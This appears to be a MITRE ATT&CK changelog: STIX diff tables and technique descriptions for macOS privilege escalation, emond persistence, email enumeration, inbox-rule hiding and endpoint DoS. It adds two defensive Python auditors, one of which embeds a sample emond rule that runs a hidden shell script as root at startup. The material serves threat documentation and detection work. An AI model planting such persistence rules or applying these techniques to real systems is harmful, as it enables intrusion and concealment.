| Adversaries may leverage the AuthorizationExecuteWithPrivileges API to escalate privileges by prompting the user for credentials.(Citation: AppleDocs AuthorizationExecuteWithPrivileges) The purpose of this API is to give application developers an easy way to perform operations with root privileges, such as for application installation or updating. This API does not validate that the program requesting root privileges comes from a reputable source or has been maliciously modified. Although this API is deprecated, it still fully functions in the latest releases of macOS. When calling this API, the user will be prompted to enter their credentials but no checks on the origin or integrity of the program are made. The program calling the API may also load world writable files which can be modified to perform malicious behavior with elevated privileges. Adversaries may abuse AuthorizationExecuteWithPrivileges to obtain root privileges in order to install malicious software on victims and install persistence mechanisms.(Citation: Death by 1000 installers; it's all broken!)(Citation: Carbon Black Shlayer Feb 2019)(Citation: OSX Coldroot RAT) This technique may be combined with [Masquerading](https://attack.mitre.org/techniques/T1036) to trick the user into granting escalated privileges to malicious code.(Citation: Death by 1000 installers; it's all broken!)(Citation: Carbon Black Shlayer Feb 2019) This technique has also been shown to work by modifying legitimate programs present on the machine that make use of this API.(Citation: Death by 1000 installers; it's all broken!) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-27 12:04:37.823000+00:00 | 2022-10-19 16:35:18.492000+00:00 |
| external_references[2]['source_name'] | Death by 1000 installers; it's all broken! | Carbon Black Shlayer Feb 2019 |
| external_references[2]['description'] | Patrick Wardle. (2017). Death by 1000 installers; it's all broken!. Retrieved August 8, 2019. | Carbon Black Threat Analysis Unit. (2019, February 12). New macOS Malware Variant of Shlayer (OSX) Discovered. Retrieved August 8, 2019. |
| external_references[2]['url'] | https://speakerdeck.com/patrickwardle/defcon-2017-death-by-1000-installers-its-all-broken?slide=8 | https://blogs.vmware.com/security/2020/02/vmware-carbon-black-tau-threat-analysis-shlayer-macos.html |
| external_references[3]['source_name'] | Carbon Black Shlayer Feb 2019 | Death by 1000 installers; it's all broken! |
| external_references[3]['description'] | Carbon Black Threat Analysis Unit. (2019, February 12). New macOS Malware Variant of Shlayer (OSX) Discovered. Retrieved August 8, 2019. | Patrick Wardle. (2017). Death by 1000 installers; it's all broken!. Retrieved August 8, 2019. |
| external_references[3]['url'] | https://www.carbonblack.com/2019/02/12/tau-threat-intelligence-notification-new-macos-malware-variant-of-shlayer-osx-discovered/ | https://speakerdeck.com/patrickwardle/defcon-2017-death-by-1000-installers-its-all-broken?slide=8 |
| Old Description | New Description |
|---|---|
| Adversaries may gather email addresses that can be used during targeting. Even if internal instances exist, organizations may have public-facing email infrastructure and addresses for employees. Adversaries may easily gather email addresses, since they may be readily available and exposed via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: HackersArise Email)(Citation: CNET Leaks) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Email Accounts](https://attack.mitre.org/techniques/T1586/002)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)). | Adversaries may gather email addresses that can be used during targeting. Even if internal instances exist, organizations may have public-facing email infrastructure and addresses for employees. Adversaries may easily gather email addresses, since they may be readily available and exposed via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: HackersArise Email)(Citation: CNET Leaks) Email addresses could also be enumerated via more active means (i.e. [Active Scanning](https://attack.mitre.org/techniques/T1595)), such as probing and analyzing responses from authentication services that may reveal valid usernames in a system.(Citation: GrimBlog UsernameEnum) For example, adversaries may be able to enumerate email addresses in Office 365 environments by querying a variety of publicly available API endpoints, such as autodiscover and GetCredentialType.(Citation: GitHub Office 365 User Enumeration)(Citation: Azure Active Directory Reconnaisance) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Email Accounts](https://attack.mitre.org/techniques/T1586/002)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Brute Force](https://attack.mitre.org/techniques/T1110) via [External Remote Services](https://attack.mitre.org/techniques/T1133)). |
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_contributors | ['Jannie Li, Microsoft Threat Intelligence\u202fCenter\u202f(MSTIC)'] | |
| x_mitre_data_sources | ['Network Traffic: Network Traffic Content'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-15 03:27:19.702000+00:00 | 2022-10-21 14:30:10.979000+00:00 |
| external_references[1]['source_name'] | HackersArise Email | Azure Active Directory Reconnaisance |
| external_references[1]['description'] | Hackers Arise. (n.d.). Email Scraping and Maltego. Retrieved October 20, 2020. | Dr. Nestori Syynimaa. (2020, June 13). Just looking: Azure Active Directory reconnaissance as an outsider. Retrieved May 27, 2022. |
| external_references[1]['url'] | https://www.hackers-arise.com/email-scraping-and-maltego | https://o365blog.com/post/just-looking/ |
| external_references[2]['source_name'] | CNET Leaks | GitHub Office 365 User Enumeration |
| external_references[2]['description'] | Ng, A. (2019, January 17). Massive breach leaks 773 million email addresses, 21 million passwords. Retrieved October 20, 2020. | gremwell. (2020, March 24). Office 365 User Enumeration. Retrieved May 27, 2022. |
| external_references[2]['url'] | https://www.cnet.com/news/massive-breach-leaks-773-million-emails-21-million-passwords/ | https://github.com/gremwell/o365enum |
| x_mitre_detection | Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access. | Monitor for suspicious network traffic that could be indicative of probing for email addresses and/or usernames, such as large/iterative quantities of authentication requests originating from a single source (especially if the source is known to be associated with an adversary/botnet). Analyzing web metadata may also reveal artifacts that can be attributed to potentially malicious activity, such as referer or user-agent string HTTP/S fields. Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access. |
| x_mitre_version | 1.0 | 1.2 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'GrimBlog UsernameEnum', 'description': 'GrimHacker. (2017, July 24). Office365 ActiveSync Username Enumeration. Retrieved December 9, 2021.', 'url': 'https://grimhacker.com/2017/07/24/office365-activesync-username-enumeration/'} | |
| external_references | {'source_name': 'HackersArise Email', 'description': 'Hackers Arise. (n.d.). Email Scraping and Maltego. Retrieved October 20, 2020.', 'url': 'https://www.hackers-arise.com/email-scraping-and-maltego'} | |
| external_references | {'source_name': 'CNET Leaks', 'description': 'Ng, A. (2019, January 17). Massive breach leaks 773 million email addresses, 21 million passwords. Retrieved October 20, 2020.', 'url': 'https://www.cnet.com/news/massive-breach-leaks-773-million-emails-21-million-passwords/'} |
| Description |
|---|
Adversaries may use email rules to hide inbound emails in a compromised user's mailbox. Many email clients allow users to create inbox rules for various email functions, including moving emails to other folders, marking emails as read, or deleting emails. Rules may be created or modified within email clients or through external features such as the New-InboxRule or Set-InboxRule [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets on Windows systems.(Citation: Microsoft Inbox Rules)(Citation: MacOS Email Rules)(Citation: Microsoft New-InboxRule)(Citation: Microsoft Set-InboxRule)
Adversaries may utilize email rules within a compromised user's mailbox to delete and/or move emails to less noticeable folders. Adversaries may do this to hide security alerts, C2 communication, or responses to [Internal Spearphishing](https://attack.mitre.org/techniques/T1534) emails sent from the compromised account.
Any user or administrator within the organization (or an adversary with valid credentials) may be able to create rules that automatically move or delete emails. These rules can be abused to impair or delay detection that would otherwise occur when the email content is seen by a user or defender. Malicious rules commonly filter out emails based on key words (such as malware, suspicious, phish, and hack) found in message bodies and subject lines.(Citation: Microsoft Cloud App Security) |
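The rule properties the description names (delete, move, mark as read, keyword filters on subject and body) are exactly what a defender should audit. The following is an added example, not ATT&CK content and not Microsoft tooling: it runs the hiding-rule checks over a constructed export whose field names mirror the properties `Get-InboxRule` returns. The list of "low-visibility" destination folders and the rule-name heuristic are assumptions, not something the description states.

```python
"""Audit Exchange / Microsoft 365 inbox rules for mail-hiding behaviour.

Added example (not ATT&CK's or Microsoft's code). SAMPLE_RULES is constructed
to mirror the property names Get-InboxRule returns; in practice you would
export them with something like
  Get-InboxRule -Mailbox <user> | ConvertTo-Json
and feed the parsed records to audit_inbox_rules().
"""
import re

# Keywords the ATT&CK description names as common filter terms in malicious rules.
SUSPICIOUS_KEYWORDS = ("malware", "suspicious", "phish", "hack")

# Destination folders where a moved message is unlikely to be noticed (assumed list).
LOW_VISIBILITY_FOLDERS = ("deleted items", "junk email", "rss feeds",
                          "rss subscriptions", "archive", "conversation history")

# Constructed sample export (not real mailbox data).
SAMPLE_RULES = [
    {"Name": "Receipts", "Enabled": True, "DeleteMessage": False, "MoveToFolder": "Receipts",
     "MarkAsRead": False, "SubjectContainsWords": ["invoice"], "BodyContainsWords": []},
    {"Name": ".", "Enabled": True, "DeleteMessage": True, "MoveToFolder": None,
     "MarkAsRead": True, "SubjectContainsWords": ["phish", "suspicious", "hacked"],
     "BodyContainsWords": ["malware"]},
    {"Name": "Cleanup", "Enabled": True, "DeleteMessage": False, "MoveToFolder": "RSS Feeds",
     "MarkAsRead": True, "SubjectContainsWords": [], "BodyContainsWords": ["password reset"]},
    {"Name": "Old", "Enabled": False, "DeleteMessage": True, "MoveToFolder": None,
     "MarkAsRead": False, "SubjectContainsWords": ["phish"], "BodyContainsWords": []},
]


def _keyword_hits(rule):
    """Security keywords matched by the rule's subject/body filters."""
    words = [w.lower() for w in (rule.get("SubjectContainsWords") or [])
             + (rule.get("BodyContainsWords") or [])]
    return sorted({k for k in SUSPICIOUS_KEYWORDS for w in words if k in w})


def audit_inbox_rules(rules):
    """Return (rule name, reasons) for every enabled rule that hides mail."""
    findings = []
    for rule in rules:
        if not rule.get("Enabled", True):          # disabled rules do nothing yet
            continue
        reasons = []
        hits = _keyword_hits(rule)
        if hits:
            reasons.append("filters on security keywords: " + ", ".join(hits))
        folder = (rule.get("MoveToFolder") or "").lower()
        if rule.get("DeleteMessage"):
            reasons.append("deletes matching messages")
        elif any(folder.endswith(f) for f in LOW_VISIBILITY_FOLDERS):
            reasons.append(f"moves messages to low-visibility folder '{rule['MoveToFolder']}'")
        if reasons and rule.get("MarkAsRead"):
            reasons.append("marks messages as read (suppresses unread indicators)")
        # Punctuation-only or one-character names are a common tell (assumption).
        if reasons and not re.search(r"[A-Za-z0-9]{2,}", rule.get("Name", "")):
            reasons.append("non-descriptive rule name")
        if reasons:
            findings.append((rule.get("Name"), reasons))
    return findings


if __name__ == "__main__":
    for name, reasons in audit_inbox_rules(SAMPLE_RULES):
        print(f"[!] rule {name!r}: " + "; ".join(reasons))
```

Only enabled rules are reported, and a plain move to a user-named folder ("Receipts") is not flagged on its own; the score comes from the combination of keyword filtering with deletion, a low-visibility destination, or mark-as-read.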
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-16 01:24:31.674000+00:00 | 2022-04-12 15:22:29.599000+00:00 |
| external_references[1]['source_name'] | Microsoft Inbox Rules | MacOS Email Rules |
| external_references[1]['description'] | Microsoft. (n.d.). Manage email messages by using rules. Retrieved June 11, 2021. | Apple. (n.d.). Use rules to manage emails you receive in Mail on Mac. Retrieved June 14, 2021. |
| external_references[1]['url'] | https://support.microsoft.com/en-us/office/manage-email-messages-by-using-rules-c24f5dea-9465-4df4-ad17-a50704d66c59 | https://support.apple.com/guide/mail/use-rules-to-manage-emails-you-receive-mlhlp1017/mac |
| external_references[2]['source_name'] | MacOS Email Rules | Microsoft BEC Campaign |
| external_references[2]['description'] | Apple. (n.d.). Use rules to manage emails you receive in Mail on Mac. Retrieved June 14, 2021. | Carr, N., Sellmer, S. (2021, June 14). Behind the scenes of business email compromise: Using cross-domain threat data to disrupt a large BEC campaign. Retrieved June 15, 2021. |
| external_references[2]['url'] | https://support.apple.com/guide/mail/use-rules-to-manage-emails-you-receive-mlhlp1017/mac | https://www.microsoft.com/security/blog/2021/06/14/behind-the-scenes-of-business-email-compromise-using-cross-domain-threat-data-to-disrupt-a-large-bec-infrastructure/ |
| external_references[3]['source_name'] | Microsoft New-InboxRule | Microsoft Inbox Rules |
| external_references[3]['description'] | Microsoft. (n.d.). New-InboxRule. Retrieved June 7, 2021. | Microsoft. (n.d.). Manage email messages by using rules. Retrieved June 11, 2021. |
| external_references[3]['url'] | https://docs.microsoft.com/en-us/powershell/module/exchange/new-inboxrule?view=exchange-ps | https://support.microsoft.com/en-us/office/manage-email-messages-by-using-rules-c24f5dea-9465-4df4-ad17-a50704d66c59 |
| external_references[4]['source_name'] | Microsoft Set-InboxRule | Microsoft New-InboxRule |
| external_references[4]['description'] | Microsoft. (n.d.). Set-InboxRule. Retrieved June 7, 2021. | Microsoft. (n.d.). New-InboxRule. Retrieved June 7, 2021. |
| external_references[4]['url'] | https://docs.microsoft.com/en-us/powershell/module/exchange/set-inboxrule?view=exchange-ps | https://docs.microsoft.com/en-us/powershell/module/exchange/new-inboxrule?view=exchange-ps |
| external_references[5]['source_name'] | Microsoft Cloud App Security | Microsoft Set-InboxRule |
| external_references[5]['description'] | Niv Goldenberg. (2018, December 12). Rule your inbox with Microsoft Cloud App Security. Retrieved June 7, 2021. | Microsoft. (n.d.). Set-InboxRule. Retrieved June 7, 2021. |
| external_references[5]['url'] | https://techcommunity.microsoft.com/t5/security-compliance-and-identity/rule-your-inbox-with-microsoft-cloud-app-security/ba-p/299154 | https://docs.microsoft.com/en-us/powershell/module/exchange/set-inboxrule?view=exchange-ps |
| external_references[6]['source_name'] | Microsoft BEC Campaign | Microsoft Cloud App Security |
| external_references[6]['description'] | Carr, N., Sellmer, S. (2021, June 14). Behind the scenes of business email compromise: Using cross-domain threat data to disrupt a large BEC campaign. Retrieved June 15, 2021. | Niv Goldenberg. (2018, December 12). Rule your inbox with Microsoft Cloud App Security. Retrieved June 7, 2021. |
| external_references[6]['url'] | https://www.microsoft.com/security/blog/2021/06/14/behind-the-scenes-of-business-email-compromise-using-cross-domain-threat-data-to-disrupt-a-large-bec-infrastructure/ | https://techcommunity.microsoft.com/t5/security-compliance-and-identity/rule-your-inbox-with-microsoft-cloud-app-security/ba-p/299154 |
| x_mitre_data_sources[1] | Command: Command Execution | Application Log: Application Log Content |
| x_mitre_data_sources[2] | Application Log: Application Log Content | Command: Command Execution |
| x_mitre_version | 1.0 | 1.1 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_platforms | Google Workspace | |
| Description |
|---|
Adversaries may gain persistence and elevate privileges by executing malicious content triggered by the Event Monitor Daemon (emond). Emond is a [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) that accepts events from various services, runs them through a simple rules engine, and takes action. The emond binary at /sbin/emond will load any rules from the /etc/emond.d/rules/ directory and take action once an explicitly defined event takes place.
The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path /private/var/db/emondClients, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) configuration file at /System/Library/LaunchDaemons/com.apple.emond.plist.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019)
Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) service. |
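Because the rule files are plists with a fixed shape, the persistence check is a parse-and-inspect job. The block below is an added example (not ATT&CK's, Apple's, or any cited author's code): it parses a constructed rule plist laid out like the published emond examples (an array of rule dicts with `name`, `enabled`, `eventTypes`, `actions`; `RunCommand` actions carrying `command`, `arguments`, `user`) and flags enabled rules that run commands, plus a helper for the QueueDirectories condition. The "system prefixes" list is an assumption used to separate Apple-shipped paths from user-writable ones.

```python
"""Audit emond rule files for command-running rules.

Added example, not part of ATT&CK or of Apple's tooling. SAMPLE_RULE_PLIST is
constructed; the key names follow the public emond rule layout and any key not
in that layout is an assumption.
"""
import plistlib

# Constructed sample of what /etc/emond.d/rules/<name>.plist might contain.
SAMPLE_RULE_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<array>
  <dict>
    <key>name</key><string>sample rule</string>
    <key>enabled</key><true/>
    <key>eventTypes</key><array><string>startup</string></array>
    <key>actions</key>
    <array>
      <dict>
        <key>type</key><string>RunCommand</string>
        <key>command</key><string>/bin/sh</string>
        <key>arguments</key><array><string>-c</string><string>/Users/Shared/.update.sh</string></array>
        <key>user</key><string>root</string>
      </dict>
    </array>
  </dict>
  <dict>
    <key>name</key><string>notify</string>
    <key>enabled</key><true/>
    <key>eventTypes</key><array><string>startup</string></array>
    <key>actions</key>
    <array>
      <dict><key>type</key><string>Log</string><key>message</key><string>emond started</string></dict>
    </array>
  </dict>
</array>
</plist>
"""

# Paths treated as Apple-shipped; anything else referenced by a rule is worth a look (assumption).
SYSTEM_PREFIXES = ("/System/", "/usr/", "/bin/", "/sbin/")


def audit_emond_rules(plist_bytes):
    """Return (rule name, command line, reasons) for enabled rules with RunCommand actions."""
    findings = []
    for rule in plistlib.loads(plist_bytes):
        if not rule.get("enabled", False):
            continue
        for action in rule.get("actions", []):
            if action.get("type") != "RunCommand":
                continue
            cmd = action.get("command", "")
            argv = [cmd] + list(action.get("arguments", []))
            reasons = ["RunCommand on events " + ", ".join(rule.get("eventTypes", []))]
            if action.get("user", "") == "root":
                reasons.append("runs as root")   # emond itself runs as root via launchd
            for a in argv:
                if a.startswith("/") and not a.startswith(SYSTEM_PREFIXES):
                    reasons.append(f"references non-system path {a}")
            findings.append((rule.get("name"), " ".join(argv), reasons))
    return findings


def emond_is_armed(queue_dir_entries):
    """True when launchd would start emond: the QueueDirectories path is non-empty.

    Pass the listing of /private/var/db/emondClients (e.g. from os.listdir)."""
    return any(e not in (".", "..") for e in queue_dir_entries)


if __name__ == "__main__":
    for name, cmdline, reasons in audit_emond_rules(SAMPLE_RULE_PLIST):
        print(f"[!] rule {name!r} -> {cmdline} ({'; '.join(reasons)})")
    print("emond armed:", emond_is_armed(["some_client_file"]))
```

In a live check, read every plist under /etc/emond.d/rules/ and pass each file's bytes to `audit_emond_rules`, and combine the result with `emond_is_armed` over the real QueueDirectories listing: a rule file alone does nothing until something drops a file into /private/var/db/emondClients.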
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-24 21:37:25.307000+00:00 | 2022-04-20 00:16:01.732000+00:00 |
| external_references[1]['source_name'] | xorrior emond Jan 2018 | magnusviri emond Apr 2016 |
| external_references[1]['description'] | Ross, Chris. (2018, January 17). Leveraging Emond on macOS For Persistence. Retrieved September 10, 2019. | Reynolds, James. (2016, April 7). What is emond?. Retrieved September 10, 2019. |
| external_references[1]['url'] | https://www.xorrior.com/emond-persistence/ | http://www.magnusviri.com/Mac/what-is-emond.html |
| external_references[2]['source_name'] | magnusviri emond Apr 2016 | xorrior emond Jan 2018 |
| external_references[2]['description'] | Reynolds, James. (2016, April 7). What is emond?. Retrieved September 10, 2019. | Ross, Chris. (2018, January 17). Leveraging Emond on macOS For Persistence. Retrieved September 10, 2019. |
| external_references[2]['url'] | http://www.magnusviri.com/Mac/what-is-emond.html | https://www.xorrior.com/emond-persistence/ |
| x_mitre_data_sources[0] | Process: Process Creation | File: File Modification |
| x_mitre_data_sources[2] | File: File Modification | Process: Process Creation |
| Old Description | New Description |
|---|---|
| Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users. Endpoint DoS can be performed by exhausting the system resources those services are hosted on or exploiting the system to cause a persistent crash condition. Example services include websites, email services, DNS, and web-based applications. Adversaries have been observed conducting DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014) An Endpoint DoS denies the availability of a service without saturating the network used to provide access to the service. Adversaries can target various layers of the application stack that is hosted on the system used to provide the service. These layers include the Operating Systems (OS), server applications such as web servers, DNS servers, databases, and the (typically web-based) applications that sit on top of them. Attacking each layer requires different techniques that take advantage of bottlenecks that are unique to the respective components. A DoS attack may be generated by a single system or multiple systems spread across the internet, which is commonly referred to as a distributed DoS (DDoS). To perform DoS attacks against endpoint resources, several aspects apply to multiple methods, including IP address spoofing and botnets. Adversaries may use the original IP address of an attacking system, or spoof the source IP address to make the attack traffic more difficult to trace back to the attacking system or to enable reflection. This can increase the difficulty defenders have in defending against the attack by reducing or eliminating the effectiveness of filtering by the source address on network defense devices. Botnets are commonly used to conduct DDoS attacks against networks and services. 
Large botnets can generate a significant amount of traffic from systems spread across the global internet. Adversaries may have the resources to build out and control their own botnet infrastructure or may rent time on an existing botnet to conduct an attack. In some of the worst cases for DDoS, so many systems are used to generate requests that each one only needs to send out a small amount of traffic to produce enough volume to exhaust the target's resources. In such circumstances, distinguishing DDoS traffic from legitimate clients becomes exceedingly difficult. Botnets have been used in some of the most high-profile DDoS attacks, such as the 2012 series of incidents that targeted major US banks.(Citation: USNYAG IranianBotnet March 2016) In cases where traffic manipulation is used, there may be points in the the global network (such as high traffic gateway routers) where packets can be altered and cause legitimate clients to execute code that directs network packets toward a target in high volume. This type of capability was previously used for the purposes of web censorship where client HTTP traffic was modified to include a reference to JavaScript that generated the DDoS code to overwhelm target web servers.(Citation: ArsTechnica Great Firewall of China) For attacks attempting to saturate the providing network, see [Network Denial of Service](https://attack.mitre.org/techniques/T1498). | Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users. Endpoint DoS can be performed by exhausting the system resources those services are hosted on or exploiting the system to cause a persistent crash condition. Example services include websites, email services, DNS, and web-based applications. 
Adversaries have been observed conducting DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014) An Endpoint DoS denies the availability of a service without saturating the network used to provide access to the service. Adversaries can target various layers of the application stack that is hosted on the system used to provide the service. These layers include the Operating Systems (OS), server applications such as web servers, DNS servers, databases, and the (typically web-based) applications that sit on top of them. Attacking each layer requires different techniques that take advantage of bottlenecks that are unique to the respective components. A DoS attack may be generated by a single system or multiple systems spread across the internet, which is commonly referred to as a distributed DoS (DDoS). To perform DoS attacks against endpoint resources, several aspects apply to multiple methods, including IP address spoofing and botnets. Adversaries may use the original IP address of an attacking system, or spoof the source IP address to make the attack traffic more difficult to trace back to the attacking system or to enable reflection. This can increase the difficulty defenders have in defending against the attack by reducing or eliminating the effectiveness of filtering by the source address on network defense devices. Botnets are commonly used to conduct DDoS attacks against networks and services. Large botnets can generate a significant amount of traffic from systems spread across the global internet. Adversaries may have the resources to build out and control their own botnet infrastructure or may rent time on an existing botnet to conduct an attack. 
In some of the worst cases for DDoS, so many systems are used to generate requests that each one only needs to send out a small amount of traffic to produce enough volume to exhaust the target's resources. In such circumstances, distinguishing DDoS traffic from legitimate clients becomes exceedingly difficult. Botnets have been used in some of the most high-profile DDoS attacks, such as the 2012 series of incidents that targeted major US banks.(Citation: USNYAG IranianBotnet March 2016) In cases where traffic manipulation is used, there may be points in the global network (such as high traffic gateway routers) where packets can be altered and cause legitimate clients to execute code that directs network packets toward a target in high volume. This type of capability was previously used for the purposes of web censorship where client HTTP traffic was modified to include a reference to JavaScript that generated the DDoS code to overwhelm target web servers.(Citation: ArsTechnica Great Firewall of China) For attacks attempting to saturate the providing network, see [Network Denial of Service](https://attack.mitre.org/techniques/T1498). |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow. Retrieved April 25, 2019. | |
| external_references | FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals Targeting Financial Institution Employee Credentials to Conduct Wire Transfer Fraud. Retrieved April 18, 2019. | |
| external_references | Goodin, D.. (2015, March 31). Massive denial-of-service attack on GitHub tied to Chinese government. Retrieved April 19, 2019. | |
| external_references | Ned Moran, Mike Scott, Mike Oppenheim of FireEye. (2014, November 3). Operation Poisoned Handover: Unveiling Ties Between APT Activity in Hong Kong’s Pro-Democracy Movement. Retrieved April 18, 2019. | |
| external_references | CAPEC-227 | |
| external_references | CAPEC-131 | |
| external_references | CAPEC-130 | |
| external_references | CAPEC-125 | |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | CAPEC-227 | |
| external_references | CAPEC-131 | |
| external_references | CAPEC-130 | |
| external_references | CAPEC-125 | |
| external_references | Wueest, C.. (2014, October 21). The continued rise of DDoS attacks. Retrieved April 24, 2019. | |
| external_references | Preet Bharara, US Attorney. (2016, March 24). Retrieved April 23, 2019. | |
| external_references | Goodin, D.. (2015, March 31). Massive denial-of-service attack on GitHub tied to Chinese government. Retrieved April 19, 2019. | |
| external_references | Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow. Retrieved April 25, 2019. | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-14 12:05:31.985000+00:00 | 2022-04-12 14:48:40.313000+00:00 |
| description | Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users. Endpoint DoS can be performed by exhausting the system resources those services are hosted on or exploiting the system to cause a persistent crash condition. Example services include websites, email services, DNS, and web-based applications. Adversaries have been observed conducting DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014) An Endpoint DoS denies the availability of a service without saturating the network used to provide access to the service. Adversaries can target various layers of the application stack that is hosted on the system used to provide the service. These layers include the Operating Systems (OS), server applications such as web servers, DNS servers, databases, and the (typically web-based) applications that sit on top of them. Attacking each layer requires different techniques that take advantage of bottlenecks that are unique to the respective components. A DoS attack may be generated by a single system or multiple systems spread across the internet, which is commonly referred to as a distributed DoS (DDoS). To perform DoS attacks against endpoint resources, several aspects apply to multiple methods, including IP address spoofing and botnets. Adversaries may use the original IP address of an attacking system, or spoof the source IP address to make the attack traffic more difficult to trace back to the attacking system or to enable reflection. This can increase the difficulty defenders have in defending against the attack by reducing or eliminating the effectiveness of filtering by the source address on network defense devices. 
Botnets are commonly used to conduct DDoS attacks against networks and services. Large botnets can generate a significant amount of traffic from systems spread across the global internet. Adversaries may have the resources to build out and control their own botnet infrastructure or may rent time on an existing botnet to conduct an attack. In some of the worst cases for DDoS, so many systems are used to generate requests that each one only needs to send out a small amount of traffic to produce enough volume to exhaust the target's resources. In such circumstances, distinguishing DDoS traffic from legitimate clients becomes exceedingly difficult. Botnets have been used in some of the most high-profile DDoS attacks, such as the 2012 series of incidents that targeted major US banks.(Citation: USNYAG IranianBotnet March 2016) In cases where traffic manipulation is used, there may be points in the the global network (such as high traffic gateway routers) where packets can be altered and cause legitimate clients to execute code that directs network packets toward a target in high volume. This type of capability was previously used for the purposes of web censorship where client HTTP traffic was modified to include a reference to JavaScript that generated the DDoS code to overwhelm target web servers.(Citation: ArsTechnica Great Firewall of China) For attacks attempting to saturate the providing network, see [Network Denial of Service](https://attack.mitre.org/techniques/T1498). | Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users. Endpoint DoS can be performed by exhausting the system resources those services are hosted on or exploiting the system to cause a persistent crash condition. Example services include websites, email services, DNS, and web-based applications. 
